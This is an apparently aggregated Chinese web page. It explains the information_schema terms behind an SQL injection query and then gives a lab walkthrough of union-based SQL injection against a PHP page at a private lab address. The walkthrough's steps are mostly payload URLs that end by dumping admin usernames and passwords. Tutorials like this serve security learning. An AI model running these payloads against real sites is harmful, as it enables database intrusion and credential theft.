sql注入,table_schema=security啥意思
Posted
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了sql注入,table_schema=security啥意思相关的知识,希望对你有一定的参考价值。
不知道题主有没有解决这个问题,但我还是回答下,先说下一些词的含义column_name:列的名称
information_schema.columns:表示所有列的信息(在整个mysql里面)
(information_schema:表示所有信息,包括库、表、列)
(information_schema.tables:表示所有表的信息)
table_schema:数据库的名称
table_name:表的名称
综上,这段sql代码的意思是从所有列中找到数据库名为"security"和数据表名为"emails"的列名 参考技术A 没什么意思,只是查询条件而已,说白了就是筛选一下,要不然返回的无用数据太多,查找有用的太麻烦…追问
这个语句能筛选出什么呢
追答不好说,字段是根据自己喜欢定义的。比方说姓名字段每个人书写习惯不同就会有很多种,比如xingMing、user、name、userName、uNeme、users等等…
SQL注入之联合查询
文章目录
简单的sql注入漏洞
information_schema
|
+-- tables
| |
| `-- table_name
| |
| `-- table_schema
|
`-- columns
|
`-- column_name
|
`-- table_name
|
`-- table_schema
实验内容
1、访问172.16.12.2
2、点开一个页面(如公司介绍),发现通过typeid.php页面传递typeid参数来访问页面,这里可能是个注入点
3、测试寻找注入点
Payload:http://172.16.12.2/typeid.php?typeid=1'%23
发现
4、Order by判断列数,判断出有5列
Payload:http://172.16.12.2/typeid.php?typeid=1 order by 5%23
5、使用联合注入判断回显位,回显位为2
Payload:
http://172.16.12.2/typeid.php?typeid=-1 union select 1,2,3,4,5%23
6、查看当前数据库名
Payload:
http://172.16.12.2/typeid.php?typeid=-1 union select 1,database(),3,4,5%23
7、查看数据库下的表
Payload:
http://172.16.12.2/typeid.php?typeid=-1 union select 1,(select group_concat(table_name)from information_schema.columns where table_schema=database()),3,4,5%23
8、查看jdy_admin表里的列
Payload:
http://172.16.12.2/typeid.php?typeid=-1 union select 1,(select group_concat(column_name)from information_schema.columns where table_schema=database()and table_name=jdy_admin),3,4,5%23
发现没回显内容,我们尝试将表名进行16进制编码(0x6a64795f61646d696e)后再进行尝试
Payload:
http://172.16.12.2/typeid.php?typeid=-1 union select 1,(select group_concat(column_name)from information_schema.columns where table_schema=database()and table_name=0x6a64795f61646d696e),3,4,5%23
9、查看列中的数据username,password
Payload:
http://172.16.12.2/typeid.php?typeid=-1 union select 1,(select group_concat(username,password)from jdycms.jdy_admin),3,4,5%23
免责声明
本文档供学习,请使用者注意使用环境并遵守国家相关法律法规!
由于使用不当造成的后果上传者概不负责!
以上是关于sql注入,table_schema=security啥意思的主要内容,如果未能解决你的问题,请参考以下文章